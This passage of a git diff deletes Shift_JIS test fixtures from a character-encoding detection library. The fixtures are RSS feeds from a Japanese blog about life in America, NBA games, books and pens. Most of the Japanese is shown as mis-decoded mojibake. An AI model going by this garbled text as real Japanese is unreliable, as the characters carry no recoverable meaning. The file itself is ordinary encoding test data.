‘ד‚ם‚ט‚ֹAך—p’[––‚ֹa‘״מ•ס‚נ”zM‚·‚י‚±‚ס‚ָƒT[ƒrƒX‚׃ƒX‚גƒVƒAƒgƒ‹‚ֵ“WJ‚³‚ך‚ִ‚¢‚ִAֵ‹ƒTƒ“ƒtƒ‰ƒ“ƒVƒXƒRƒGƒƒA‚ֵ‚אn‚‚ֱ‚½B - -Hiro -2005-12-13T09:10:00-08:00 - - -ƒAƒƒƒJl‚ֶץi -http://andore.com/inami/mtarchives/003389.html -ֵ‹AƒIƒ‚ּ‰ס‚ט‚ֵ—¬s‚ֱ‚ִ‚י‚±‚ּƒrƒfƒIB ‚‚¾©‚ִ‚ָ‚¢l‚ֽ‚‚¸©‚ִ‚©‚ח‘±‚«‚נ“ַ‚ס‚ֵ—~‚µ‚¢B

    - -

    -Documentary On Japanese Sushi - Google Video
    -(—v FlashAƒƒ“ƒN‚נƒNƒƒbƒN‚·‚י‚ֶ‚·‚®‰¹•t‚«‚ִֵ¶‚³‚ך‚י‚ּ‚ֵ’ˆ׃) -

    - -

    ץi‚׃AƒƒƒJ‚ֹ“‚ֱ‚ִ‚«‚ִ•ׂ½‚¿A“ֱ‚ֹƒAƒWƒAl‚א‘½‚¢ƒTƒ“ƒtƒ‰ƒ“ƒVƒXƒR•׃‚ֵ‚ֽץi‚ֽ‹\ˆך”“I‚ֵA“X‚ּ‚ז‚µ‚ם‚י‚µ‚ֽ•‚ֹ‚µ‚ִƒ_ƒEƒ“ƒ^ƒEƒ“‚ֹ‚ֽ1‚ֲ‚®‚ח‚¢ץiƒƒXƒgƒ‰ƒ“‚ׂ ‚י‚‚ַZ“§‚µ‚ִ‚«‚½B ‚ֵ‚אAץi‚ּ‚±‚ֶ‚נ‚ז‚­‚ם‚©‚ֱ‚ִ‚י‚©‚ֶ¾‚₪‚ֶ‚‚¾‚‚¾u???v‚©‚א‚µ‚ך‚ָ‚¢B

    ]]>
    -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-11T11:00:00-08:00 -
    - -Warriors vs Detroit Pistons -http://andore.com/inami/mtarchives/003388.html -‘O‰סƒvƒƒV[ƒYƒ“ƒ}ƒbƒ`‚נֿ‚ֹs‚ֱ‚ִƒCƒ}ƒCƒ`‚¾‚ֱ‚½‚±‚ֶ‚א‚ ‚טA“¯‚¶ƒƒ“ƒo[‚ֵƒV[ƒYƒ“’†‚ּ‡‚נֿ‚ֹs‚­‚±‚ֶ‚ֹB ‘־ם‘ט‚ֽז•‚ּƒƒNƒGƒXƒg‚א‚ ‚ֱ‚ִ Detroit PistonsB Pistons ‚ֽˆךנ”N‚ּ NBA ƒ`ƒƒƒ“ƒsƒIƒ“Aנ”N‚א NBA ƒtƒ@ƒCƒiƒ‹‚ֵ San Antonio Spurs ‚ֹ•‰‚¯‚½‚ּ‚ֵ ™ֳNBA ƒ`ƒƒƒ“ƒsƒIƒ“‚ֶ‚¢‚₪‹­‹ƒ`[ƒ€B ¡ƒV[ƒYƒ“‚א‚±‚ּ‡‚ּ‘O‚‚ֵ‚ֵ 13 2”s ‚ֶ‚¢‚₪‚א‚ּ‚·‚²‚¢ƒ`[ƒ€B -04 NBA Basketball -Hiro -2005-12-10T14:30:00-08:00 - - -טp‚µ‚ָ‚¢‚ֵ! -http://andore.com/inami/mtarchives/003384.html -—[§ƒtƒW‚ֹ–”’‚¢‹»–¡[‚¢‹L–‚×B -‹}«’‚‰(‚¢‚ם‚ה‚י–׃’°)‚ּטp‚נ‚·‚י‚½‚‚ֹ‚©‚©‚י‚¨‹א‚נe“ss‚²‚ֶ‚ֹ”הr‚µ‚ִA“ת–{‚ּ‹}«’‚‰‚ּטp“‰@”ן‚ֶׂ‚ִ‚א’ב‚­ˆדׂ‚א–׳‚©‚ח‚ָ‚¢‚©‚ח‚ג‚ט‚½‚ׂח‚ָ‚¢‚ֶ‚¢‚₪˜b‚ָ‚ּ‚¾‚×A“ת–{‚ּטp“‰@”ן 38–‰~ˆָד‚ֹƒAƒƒƒJ‚ּטp“‰@”ן‚׈ם‚¾B -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-06T09:00:00-08:00 - - -ƒNƒƒXƒ}ƒXƒvƒƒ[ƒ“ƒg‚ֹƒA[ƒP[ƒhƒQ[ƒ€‚ֽ‚¢‚©‚×? -http://andore.com/inami/mtarchives/003381.html -¡“ת‚ּV•·L‚ֵ©‚ֲ‚¯‚½–”’‚¢ƒ‚ƒmB Target ‚ֶ‚¢‚₪“ת–{‚ֵ¾‚₪ƒz[ƒ€ƒZƒ“ƒ^[‚ּ‚ז‚₪‚ָ‚¨“X‚ּL‚ָ‚ס‚¾‚¯‚ַAƒNƒƒXƒ}ƒXתְ’ט‚ֵƒA[ƒP[ƒhƒQ[ƒ€‚ּג‘ּ‚נ”„‚ֱ‚ִ‚¢‚יB ‚±‚ּג‘ּ‚ֵ‚¢‚­‚ֲ‚©‚ּƒQ[ƒ€‚×—V‚׳‚י‚ּ‚¾‚×AƒQ[ƒ€‚ּƒ‰ƒCƒ“ƒiƒbƒv‚ֽA uJoustA Defender I and IIA RobotronA Rampage ‚ָ‚ַv... ‚ֶ‚ ‚י‚ז‚₪‚ֹ‘S‘R“יץ‚‚ּ‚ָ‚¢‚א‚ּ‚־‚©‚ט...B G‚נ©‚ִ‚אƒtƒ@ƒ~ƒRƒ“’צ“x‚ּ‚א‚ּ‚ָ‚ּ‚ֵ‹\ֳ‚¢ƒQ[ƒ€‚ּ•”ֵ‚ֶ‚¢‚₪´‚¶‚¾B -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-04T12:00:00-08:00 - - -ƒTƒbƒJ[“ת–{‘ד•\‚׃Tƒ“ƒtƒ‰ƒ“ƒVƒXƒR‚ֵ‡ -http://andore.com/inami/mtarchives/003379.html -ƒLƒ^[ƒNƒ‹[B -2”N‚‚ַ‘O‚ֹ‚אAe‘P‡‚ֶ‚¢‚₪‚±‚ֶ‚ֵƒAƒƒƒJ‘ד•\‚ֶƒTƒ“ƒzƒ[‚ֵ‡‚·‚י‚ֶ‚¢‚₪‚ּ‚ׂ ‚ֱ‚½‚×AƒuƒbƒVƒ…‚׃Cƒ‰ƒN‚ֶם‘ˆ‚נn‚‚½‚½‚A“ת–{‘ד•\‚׃AƒƒƒJ‚ֹ—ˆ‚י‚ּ‚נ’†~‚µ‚½‚ֶ‚¢‚₪oˆ‚ׂ ‚ֱ‚½B ‚µ‚©‚µA¡“x‚ֽ‚«‚ֱ‚ֶ‘וה•v‚¾‚כ‚₪Bג‘־s‚­‚¼[B]]> -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-12-02T08:45:00-08:00 - - -Warriors, 11‚ֽƒ`[ƒ€‹L˜^ƒ^ƒC‚ּ11! -http://andore.com/inami/mtarchives/003376.html -11‚ּn‚‚ֹƒXƒ^[ƒg‚µ‚½NBAAֵ‰‚ּ‚×I‚ם‚ֱ‚ִU‚ט•װ‚ֱ‚ִ‚‚י‚ֶ Warriors ‚ֽ‰½‚ֶ 116”s‚ֶ‘ו‚«‚­‚¿‰z‚µB Pacific Division ‚ּ‡ˆ‚א 2ˆ (‚µ‚©‚אA1ˆ‚ּ Clippers ‚ֽ 105”s ‚ֵƒQ[ƒ€·‚ֽ 0) ‚ֶ‚¢‚₪D¬ׁ‚ֶ‚ָ‚ֱ‚½B ‡“ת’צ‚ּײW‚ֵ¡ƒV[ƒYƒ“‚ֽ‡”‚ב½‚©‚ֱ‚½‚ֶ‚¢‚₪‚ּ‚א‚ ‚י‚×A11‚ֹ11‚µ‚½‚ּ‚ְֽ‚ֹ31”N‚װ‚ט‚¾‚»‚₪‚¾B -04 NBA Basketball -Hiro -2005-12-01T13:00:00-08:00 - - -ƒAƒtƒ^[ƒTƒ“ƒNƒXƒMƒrƒ“ƒOƒZ[ƒ‹‚ּl¬‚‚ֹ‹ֱ‚­ -http://andore.com/inami/mtarchives/003369.html -•ְ‚ס‚ֵ‚‚½B -‚ֶ‚¢‚ֱ‚ִ‚א’©5ƒI[ƒvƒ“‚ּ Best Buy ‚ֶ‚¢‚₪‰ֶ“d—”ּ“X‚ֹ 450•ׂ²‚כ‚ֹ’…‚¯‚־‚¢‚¢‚©‚ָ‚ֶ‚¢‚₪‚¨‹Cy‚ָƒ‚ƒm‚¾‚ֱ‚½‚ס‚¾‚¯‚ַA©•ֳּׂ‚³‚נ”F¯B ‚½‚‚ֹ‰J‚א~‚יˆ«“Vף‚ּ’†AƒI[ƒvƒ“‘O‚ֹ‚ֽ‚·‚ֵ‚ֹ1000l‚®‚ח‚¢‚¢‚י‚ס‚¶‚ב‚ָ‚¢‚©‚ֶ‚¢‚₪‚®‚ח‚¢l‚×W‚‚ֱ‚ִ‚¢‚½B -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-11-25T08:00:00-08:00 - - -ƒAƒtƒ^[ƒTƒ“ƒNƒXƒMƒrƒ“ƒOƒZ[ƒ‹‚ֵPC‚ּ’l’i‚ׂ³‚ח‚ֹ‰÷— -http://andore.com/inami/mtarchives/003367.html -CNet ‚ּ‹L–‚ֵ Walmart (ƒEƒHƒ‹ƒ}[ƒg) ‚× $398 ‚ָƒm[ƒg‚גƒfƒXƒNƒgƒbƒvPC‚נ”­”„‚©? ‚ֶ‚¢‚₪‚ּ‚ׂ ‚ֱ‚½‚×Aְ‚ֽ‚א‚ֱ‚ֶ‚·‚²‚©‚ֱ‚½B]]> -02 ƒAƒƒƒJ¶ˆ -Hiro -2005-11-24T11:00:00-08:00 - - - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/andore.com.money.xml b/chardet/tests/SHIFT_JIS/andore.com.money.xml deleted file mode 100644 index 72b8d75..0000000 --- a/chardet/tests/SHIFT_JIS/andore.com.money.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -‚±‚ּ“¹‚ֽ‚¢‚ֲ‚©—ˆ‚½“¹... REBOOTED -http://andore.com/money/ -‰½“x‚א‰½“x‚אJ‚ט•װ‚·ד‰ק‚ּ”X.....‚»‚ס‚ָ“תX‚ּ‹L˜^ -en-us - -2006-01-03T22:02:36+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -Google Adsense‚ּH -http://andore.com/money/archives/003417.html -ƒAƒƒƒJ‚ֵ‚ׂס‚־‚ט‚‚µ‚ו‚₪: Google PC ‚×”­”„‚³‚ך‚י? ‚±‚ּƒGƒ“ƒgƒ‚נ“ַ‚ס‚ֵv‚ֱ‚½‚ּ‚ֽAƒAƒhƒZƒ“ƒX‚נg‚ֱ‚ִA¢E’†‚ּWebƒTƒCƒg‚נ©׀‚ּL”}‘ּ‚ֹ‚µ‚ִ‚µ‚‚ֱ‚½Google‚ּ‚ּˆךט‚ֶ‚µ‚ִA¢E’†‚ֵ–³‘‚ֹ“d‹C‘ד‚נ˜Q”ן‚µ‚ִƒXƒNƒ[ƒ“ƒZ[ƒo‚נ“®‚©‚µ‚ִ‚¢‚יCPU‘¹‚נ‘©‚ֻ‚יd|‚¯‚נg‚ֱ‚ִA‚»‚ּ‚©‚«W‚‚½CPUƒpƒ[‚נ”„‚י‚ֶ‚¢‚₪ƒrƒWƒlƒX‚נ‚·‚י‚ּ‚©‚ָ‚A‚ֶB “תXAƒrƒfƒIƒLƒƒƒvƒ`ƒƒ[‚µ‚½‘f‚נ‚¹‚ֱ‚¹‚ֶƒGƒ“ƒR[ƒh‚µ‚ִ‚י’mlH‚­AuXAƒLƒƒƒvƒ`ƒƒ[‚·‚י‘f‚ָׂ‚­‚ִCPUƒpƒ[(‚ֲ‚‚טA“d‹C‘ד‚˜װ)‚נ˜Q”ן‚µ‚ִ‚י‚±‚ֶ‚ׂ ‚יB‚ַ‚ֱ‚©‚ֵCPUƒpƒ[‚נ”ƒ‚¢ז‚ֱ‚ִ‚­‚ך‚ס‚©‚ָ‚v‚ֶ‚¢‚₪‚ּ‚נ•·‚¢‚½‚±‚ֶ‚ׂ ‚י‚ּ‚ֵAש—v‚ֽ‚ ‚י‚ֶv‚₪B ‚ֵ‚אA‚ם‚´‚ם‚´PC‚נ”„‚י‚ֶ‚±‚כ‚©‚ח‚ג‚ח‚ָ‚­‚ִ‚אBBB‚ֶ‚¢‚₪‹C‚ׂµ‚ָ‚¢‚ם‚¯‚ֵ‚ֽ‚ָ‚¢‚×B uƒ}ƒCƒNƒƒ\ƒtƒg‚ּOS‚ֵ“®‚¢‚ִ‚¢‚יPC‚ּCPUƒpƒ[‚ֽ”ƒז‚ֵ‚«‚‚¹‚סv‚‚½‚¢‚ָ‚±‚ֶ‚נ‚µ‚½‚¢‚ּ‚©H... -WebSite -money -2006-01-03T22:02:36+09:00 - - -Joel on Software -http://andore.com/money/archives/003414.html -Joel on Software\ƒ\ƒtƒgƒEƒFƒAJ”­ׂAvׂAƒ}ƒl[ƒWƒƒA‚»‚ך‚ֹK‚©•sK‚©‰½‚ח‚©‚ּ`‚ֵ”‚ח‚ֶ“­‚­‰H–‚ֹ‚ָ‚ֱ‚½lX‚×ײS‚נ•ר‚­‚ֵ‚ ‚כ‚₪Aƒ\ƒtƒgƒEƒFƒAA•ְ‚ׁ‚ֹ‰X‚ֹ‚µ‚ִƒ\ƒtƒgƒEƒFƒA‚ֹײ˜A‚·‚י”‚ּ–ג‘ט‚ֹ‚ֲ‚¢‚ִJoel Spolsky ֲ–״ –ץ ƒI[ƒ€׀ 2005-12”„‚טד‚°ƒ‰ƒ“ƒLƒ“ƒO : Amazon‚ֵ‚µ‚­©‚י by G-Tools ‚ג‚ֱ‚ֿ‚טA‚¢‚¢‚ֵ‚·‚ֻ‚¥B Web‚ֵ“ַ‚ס‚ֵ‚ִA‘׀‰»‚³‚ך‚½‚ֶ‚½‚ס‚ֹA´‘‚נ”ƒ‚¢‹‚‚‚µ‚½‚×A‚ג‚ֱ‚ֿ‚ט–M–ף”ֵ‚א”ƒ‚¢‚‚µ‚½B ‚₪‚ס‚₪‚סטץ‚¢‚½‚טAƒjƒ„ƒ‚ֶ‚µ‚ָ‚ׂח“ַ‚ס‚ֵ‚‚·B ƒ\ƒtƒgƒEƒFƒA‚ֵ”ׁH‚ֱ‚ִ‚י‚ג‚ֲA‘Sˆץ‰ֵA‚ֶv‚₪‚×A–{—ˆ“ַ‚‚׳‚«A‚¢‚גA“ַ‚ס‚ֵ—~‚µ‚¢lװ‚ֽAƒ\ƒtƒgƒEƒFƒA‚ֵ”ׁ‚נH‚ֱ‚ִ‚יA‚ֶ‚¢‚₪©o‚ָׂ‚¢‚ּ‚ֵג‘־‚ֹ“ַ‚‚ָ‚¢‚ֶv‚₪B u‰´‚ֽƒ\ƒtƒgƒEƒFƒA‰®‚¶‚ב‚ָ‚¢‚א‚סBPM‰®‚¾‚א‚סv‚ֶ‚¢‚₪˜A’†‚×ְ‚ֽˆך”װƒ\ƒtƒgƒEƒFƒAJ”­ƒvƒƒWƒFƒNƒg‚ֹ‚ֽ—LQ‚ּ‚ז‚₪‚ָ‹C‚ׂ·‚י¡“תq‚ּƒSƒB ‚«‚ֱ‚ֶAu‚±‚ך‚נ“ַ‚ס‚ַ‚¯‚־A‚ ‚ָ‚½‚ּƒGƒ“ƒWƒjƒA‚ֶ‚µ‚ִ‚ּsך‰¿’l‚×››‰~ƒAƒbƒv‚µ‚‚·Bv‚‚½‚¢‚ָƒ}[ƒPƒeƒBƒ“ƒO‚וK—v‚ָ‚ּ‚©‚אB... -book -money -2005-12-31T15:36:13+09:00 - - -”N‚ּ£‚ֹ‚₪‚ך‚µ‚¢‚¨¾—t -http://andore.com/money/archives/003413.html -Sota‚ּ“ת‹L(2005-12-29) נ‚µ‚¢¾—t‚ּ”X‚ֹ—‚ׂ ‚׃‚ך‚ִ‚«‚‚·B ‚«‚ֱ‚ֶ–ֿ‘z‚×”ל‘ו‰»‚µ‚½‹‰‚¾‚ֶ‚ֽv‚¢‚‚·B ‚ֵ‚אA»ְ‚נ’m‚טA”‚µ‚¢v‚¢‚נ‚³‚¹‚ָ‚¢‚½‚‚ֹ‚אA‚ׂס‚־‚ח‚ֹ‚ב‚A‚ֶv‚¢‚‚µ‚½B ‚÷‚׀‚ֶ‚א—ˆ”N‚ֽAƒRƒ‰ƒ{ƒ[ƒg‚ֵ‚«‚י‚ז‚₪‚ָƒXƒL[ƒ€‚נl‚¦‚ְִ»‚³‚¹‚½‚¢‚ֶv‚¢‚‚·B ’‹װ‚ֽ‰ן׀‚ֹ‘®‚µ‚ִ‚¢‚ִA•›‹ֶA‚ ‚י‚¢‚ֽƒvƒ‰ƒCƒx[ƒg‚ֵƒ\ƒtƒgƒEƒFƒAJ”­‚נ‚ג‚י‚ז‚₪‚ָƒGƒ“ƒWƒjƒA‚ֶ‚©A‚ ‚י‚¢‚ֽƒtƒ[‚ּƒvƒƒOƒ‰ƒ}‚נƒo[ƒ`ƒƒƒ‹‚ֹ‘gD‰»‚µ‚½LLP‚×ל‚ך‚ָ‚¢‚©‚ָ‚A‚ֶ‚׃‚ֶ¡’©‚ּƒeƒƒr‚נ©‚ִ‚ִv‚¢‚‚µ‚½B ƒ\ƒtƒgƒEƒFƒAEl‹C¿‚ֹ‚א‚ ‚י‚ז‚₪‚ֹAƒ\ƒtƒgƒEƒFƒAƒGƒ“ƒWƒjƒA‚ּ¢E‚ֽA‚¨‚ֱ‚µ‚ב‚י‚ֶ‚¨‚טA“k’ם§“x‚ֹ‹‚¢‚א‚ּ‚ׂ ‚י‚ֶv‚₪‚µA¡‚ּ¢װ‚ֵ‚ג‚ֱ‚ִ‚י‚ז‚₪‚ָ“×”““ƒrƒWƒlƒX‚ֵ‚ֽ‚₪‚‚­‚¢‚©‚ָ‚¢‚±‚ֶ‚ֽ“ת‚ּ–‚נ©‚י‚ז‚ט–¾‚ח‚©BJoel on Software‚ּƒCƒ“ƒgƒ‚ֹ‚אA ‘וH‚ּˆך’c‚×AƒlƒW‚ֶ‚ֽ‰½‚©•·‚¢‚½‚±‚ֶ‚±‚ֶ‚א‚ָ‚¢‚‚‰ֶ‹ן‚נל‚כ‚₪‚ֶ‚µ‚ִ‚¢‚י‚‚½‚¢‚ָ‚א‚ּ‚¾B”‚ח‚ֽ“B‚¾‚¯‚ֹ—‚ֱ‚ִ‚¨‚טA‚»‚ך‚נƒ^ƒbƒvƒVƒ…[ƒY‚ֵ–״‚ֹ‘ֵ‚¿•t‚¯‚ִ‚¢‚י‚ּ‚¾‚×A‚»‚ך‚ֶ‚¢‚₪‚ּ‚א’N‚א”‚ח‚ֹ‹א’ֶ‚ּ‚±‚ֶ‚נ‹³‚¦‚ִ‚­‚ך‚ָ‚©‚ֱ‚½‚©‚ח‚¾B ‚ֶ‘‚¢‚ִ‚ ‚י‚×A‚‚³‚ֹ‚±‚ך‚×»ְ‚¾‚כ‚₪‚ֶv‚₪B ‚±‚ּ»ף‚נ‘ֵ”j‚·‚י‚ֹ‚ֽA”‚ח‚ֹ‹א’ֶ‚ּ‘¶‚נ‹³‚¦‚י‚±‚ֶ‚אd—v‚¾‚ֶ‚ֽv‚₪‚×A‚»‚ך‚ז‚ט‚א‚‚¸‚ְֽ‚ֹƒvƒƒWƒFƒNƒg‚נ‚װ‚ס‰ס‚µ‚ִ‚¢‚י—D‚ך‚½ƒGƒ“ƒWƒjƒAA‹א’ֶ‚גƒlƒW‚נg‚¢‚±‚ָ‚µ‚ִ‚¢‚יˆך•”‚ּƒGƒ“ƒWƒjƒA‚ֹ•ס‚¢‚י•K—v‚ׂ ‚י‚ֶv‚₪B©‚ח•׳‹­A₪‹†‚נ‚µ‚ִƒXƒLƒ‹ד‚·‚י‚±‚ֶ‚ש•ֹׂ‚ֶ‚ֱ‚ִ‚אƒƒƒbƒg‚ׂ ‚יA‚ֶv‚ם‚¹‚י‚ז‚₪‚ֲָ‹«‚נל‚י‚±‚ֶ‚וK—v‚¾B ‚א‚¿‚כ‚סA‹א’ֶ‚ּ‘¶‚נ‹³‚¦‚ִ‚ג‚טA‚»‚ּך‚ֵg‚¦‚י‚ז‚₪‚ֹ‚·‚י‚±‚ֶ‚ֽ—eˆױ‚¢B‚µ‚©‚µA‹Q‚¦‚½l‚ֹ‹›‚נ—^‚¦‚י‚ּ‚ֵ‚ֽ‚ָ‚­A‹›’‚ט‚ּ‚ג‚ט•‚נ‹³‚¦‚י‚±‚ֶ‚×–{—ˆ‚ּ‹³ˆח‚¾‚ֶ‚¢‚₪˜b‚א‚ ‚י‚ז‚₪‚ֹAƒXƒLƒ‹‚נ’¼—^‚¦‚י‚ּ‚ֵ‚ֽ‚ָ‚­A©•ֵׂƒXƒLƒ‹‚נד‚³‚¹‚י‚±‚ֶ‚ֵׂ‚«‚י‚ז‚₪‚ָƒXƒLƒ‹‚נg‚ֹ‚ֲ‚¯‚י‚±‚ֶ‚וK—v‚¾‚ֶv‚₪B ‚ֶA”N‚ּ£‚ֹ‚ֲ‚ח‚ֲ‚ח‚ֶl‚¦‚ִ‚‚‚µ‚½B—ˆ”N‚ֽ‚±‚ּ‚±‚ֶ‚אƒe[ƒ}‚ֶ‚µ‚ִˆ“®‚µ‚ִ‚¢‚±‚₪‚ֶv‚¢‚‚·B... -general -money -2005-12-31T15:23:13+09:00 - - -ƒ{ƒ‹ƒh[‘‚«”ה‚׳ -http://andore.com/money/archives/003400.html - ‚ֵA‚»‚ך‚¼‚ך”הr‚µ‚½‚ּ‚ׂ±‚ּ^B(©‚ֹ‚­‚¢‚©‚ָH) ˆך”װד‚©‚חAuni-ball@SigNo ƒ{ƒ‹ƒh[ƒuƒ‰ƒbƒNA@ƒJƒ‹ƒeƒBƒG‚ּƒ{ƒ‹ƒh[A@ƒ‚ƒ“ƒuƒ‰ƒ“‚ּSeaon's Greetings, “¯‚¶‚­ƒ‚ƒ“ƒuƒ‰ƒ“‚ּƒ{ƒ‹ƒh[B ƒJƒ‹ƒeƒBƒG‚ֽ‚ג‚גװ‚‚׋­‚‚ֵA‚±‚ך‚ֽ‚ַ‚¿‚ח‚©‚ֶ‚¢‚₪‚ֶAƒJƒ‹ƒeƒBƒG‚ּƒuƒ‰ƒ“ƒhƒJƒ‰[‚ֶ‚ָ‚ֱ‚ִ‚¢‚יAƒƒCƒ“ƒƒbƒh‚ָ”חv»•i‚ּF‚נƒCƒ[ƒW‚µ‚½‚א‚ּ‚ֵ‚ֽH‚ֶ‘z‘‚µ‚ִ‚¢‚‚·B ‘±‚¢‚ִAƒ‚ƒ“ƒuƒ‰ƒ“‚ּ‹Gְ’ט•iB–{“–‚ֹƒ`ƒ‡ƒRƒ[ƒgƒuƒ‰ƒEƒ“‚ֱ‚ִ´‚¶B ‚ֵAƒ‚ƒ“ƒuƒ‰ƒ“‚ּƒ{ƒ‹ƒh[B‚±‚ך‚ֽA‚ג‚ֱ‚ֿ‚ט”–‚B ‚¿‚ָ‚‚ֹA†‚ֽAƒƒfƒBƒA‚ּ12”װBƒyƒ“‚ֽA‚¢‚‚גƒ{ƒgƒ‹ƒCƒ“ƒN‚µ‘‚«ך—p‚ֲ‚¯ƒyƒ“‚ֶ‚ָ‚ט‚ֲ‚ֲ‚ ‚יAƒ~ƒjEGB ˆך•”‚ֹ‚ֽAƒ~ƒjEG‚ֽAƒCƒ“ƒN‚ּƒtƒ[‚׈«‚¢A‚ֶ‚¢‚₪א‚א‚ ‚ט‚‚·‚×A„‚א1–{‚ֽA•t‘®‚ּƒJ[ƒgƒƒbƒWƒCƒ“ƒN‚נ‘}‚µ‚ִ‚¢‚י‚א‚ּ‚ּAƒCƒ“ƒN‚×o‚ִ‚±‚ָ‚¢ף‹µBˆך“xפע‚µ‚½‚ּ‚ֵ‚·‚×Aƒ_ƒ‚ח‚µ‚¢B‚ָ‚ּ‚ֵA2–{‚ ‚י‚₪‚¿‚ּ1–{‚ֽ®‘S‚ֹ‚µ‘‚«—p‚ֶ‚µ‚ִƒJ[ƒgƒƒbƒW‚נ·‚³‚¸‚ֹg‚ֱ‚ִ‚‚·B ‚ֶ‚ט‚ ‚¦‚¸A¡LAMY‚ֹ“‚ֱ‚ִ‚¢‚יALAMY‚ּƒuƒ‹[ƒuƒ‰ƒbƒN‚×״‚ך‚½‚חA‚ֽƒ‚ƒ“ƒuƒ‰ƒ“‹Gְ’ט‚ֹ‚µ‚‚µ‚ו‚₪‚©‚ֻB... -Stationery -money -2005-12-19T00:25:43+09:00 - - -’ƒF‚ּƒCƒ“ƒN‚נ‹‚‚ִ -http://andore.com/money/archives/003399.html -ˆָ‘OAF‚ ‚¢‚נ‹C‚ֹ“‚ֱ‚ִAUNI signo‚ֶ‚¢‚₪…«ƒ{[ƒ‹ƒyƒ“‚ּƒ{ƒ‹ƒh[ƒuƒ‰ƒbƒN‚ֶ‚¢‚₪F‚נˆ₪—p‚µ‚ִ‚¢‚½(³m‚ֹ‚ֽˆ₪—p‚µ‚ִ‚¢‚י)B –”N•M(LAMY Safari‚ּƒXƒPƒ‹ƒgƒ“)‚ֹ’ƒF‚נg‚ֱ‚ִ‚‚½‚­‚ִA‚ ‚¿‚±‚¿’T‚µ‚‚­‚ֱ‚½BְA•¶–[‹ן“XAƒƒtƒgAƒnƒ“ƒY“™‚ּˆך”“I‚ָ“X‚ֹ‚¨‚¢‚ִ‚ ‚יƒCƒ“ƒN‚ֽAƒuƒ‰ƒbƒNAƒuƒ‹[Aƒuƒ‹[ƒuƒ‰ƒbƒNA‚ ‚י‚¢‚ֽ‚¹‚¢‚÷‚¢װ‚‚ֵB’ƒFA‚א‚µ‚­‚ֽƒ{ƒ‹ƒh[nF‚ּƒCƒ“ƒN‚×’u‚¢‚ִ‚ ‚י‚±‚ֶ‚ֽ‚‚ךB ‚ֵA¡‰ס‚ֽ’r‘“•‚ֹ“‚ֱ‚ִ‚¢‚י‹גְˆֹ“‰®B ‚¢‚¿‚¨‚₪Aƒ^[ƒQƒbƒg‚ֶ‚µ‚½‚ּ‚ֽA ƒJƒ‹ƒeƒBƒG‚ּƒ{ƒ‹ƒh[ ‚ֶA ƒ‚ƒ“ƒuƒ‰ƒ“‚ּƒ{ƒ‹ƒh[B ‚ֶ‚±‚כ‚×A“V‰÷‚ּˆֹ“‰®‚³‚ס‚ֹ‚אֹ‚ֽ‚ָ‚¢A‚ֶ‚ּ‚±‚ֶB‚³‚ח‚ֹAƒJƒ‹ƒeƒBƒG‚ָ‚חA‰w‚±‚₪‚ּ¼•”‚³‚ס‚ּ6K‚ֹƒJƒ‹ƒeƒBƒG’¼‰c“X‚ׂ ‚י‚©‚חs‚ֱ‚ִ‚‚ִ‚ֽH‚ֶ‚¢‚₪ƒAƒhƒoƒCƒX‚נ‚¢‚½‚¾‚¢‚½B ‚ָ‚י‚‚ַA’¼‰c“X‚©I(‚·‚¢‚‚¹‚סAƒuƒ‰ƒ“ƒh‚ֶ‚µ‚ִ‚ּƒJƒ‹ƒeƒBƒG‚ֹ‚ֽ‹»–¡‚ָ‚¢‚ּv‚¢‚א‚ֲ‚©‚ָ‚©‚ֱ‚½j ‚ֶv‚ֱ‚ִ‚י‚ֶA u’ƒFn‚¾‚ֱ‚½‚חA‚±‚ס‚ָ‚ס‚ ‚ט‚‚·‚¯‚ַBv‚ֶ¾‚ֱ‚ִo‚µ‚ִ‚«‚ִ‚­‚ך‚½‚ּ‚×A ƒ‚ƒ“ƒuƒ‰ƒ“‚ּSeason's Greetings‚ֶ‚¢‚₪‹Gְ’ט‚א‚ּB‚ַ‚₪‚ג‚חƒNƒƒXƒ}ƒXd—l‚ח‚µ‚­Aב‚ּ‹»‚ּƒV[ƒ‹‚׃pƒbƒP[ƒW‚ֹ’£‚ֱ‚ִ‚ ‚יB ‚µ‘‚«‚נ‚³‚¹‚ִ‚א‚ח‚₪‚ֶA‹‚‚ִ‚¢‚½ƒ{ƒ‹ƒh[ƒuƒ‰ƒbƒN‚ז‚ט‚א‚ַ‚¿‚ח‚©‚ֶ‚¢‚₪‚ֶAƒ[ƒKƒ‹ƒVƒ…[ƒY‚ּƒ`ƒ‡ƒRƒ[ƒgƒuƒ‰ƒEƒ“‚ֹ—ַ‚­—‚½‚±‚°’ƒnB‚³‚ח‚ֹA‚±‚ּƒCƒ“ƒN‚ֽƒVƒiƒ‚ƒ“‚ֶ‚¢‚₪‚©ƒXƒpƒCƒV[‚ָ‚ט‚ֲׂ‚¢‚ִ‚¢‚י‚ֶ‚¢‚₪‹ֳ‚ֱ‚½‚א‚ּB ‚׀‚ֶ–‚ֵ‹C‚ֹ“‚ט‘¦w“B ‘±‚¢‚ִA“Xˆץ‚³‚ס‚ּƒAƒhƒoƒCƒX‚ֹ]‚ֱ‚ִ¼•”6K‚ּƒJƒ‹ƒeƒBƒG‚ײB‚ז‚₪‚ג‚­ƒJƒ‹ƒeƒBƒGƒ{ƒ‹ƒh[‚ֹּ‚ֹo‰ן‚¦‚½‚ּ‚¾‚×Aˆִ‚ּ’ט‚µ‘‚«‚ֽ‚³‚¹‚ִ‚א‚ח‚¦‚ָ‚©‚ֱ‚½Bd•‚ָׂ‚¢‚ּ‚ֵAְ‚ּF‚ ‚¢‚נ©‚¸‚ֹw“B‚»‚ּ‚ֹAƒ{ƒgƒ‹‚ּ” ‚נ“‚ך‚ִ‚­‚ך‚½‚ּ‚בO‚ּƒGƒ“ƒgƒ‚ּ^‚ּ‚ז‚₪‚ָA¬•¨—p‘B 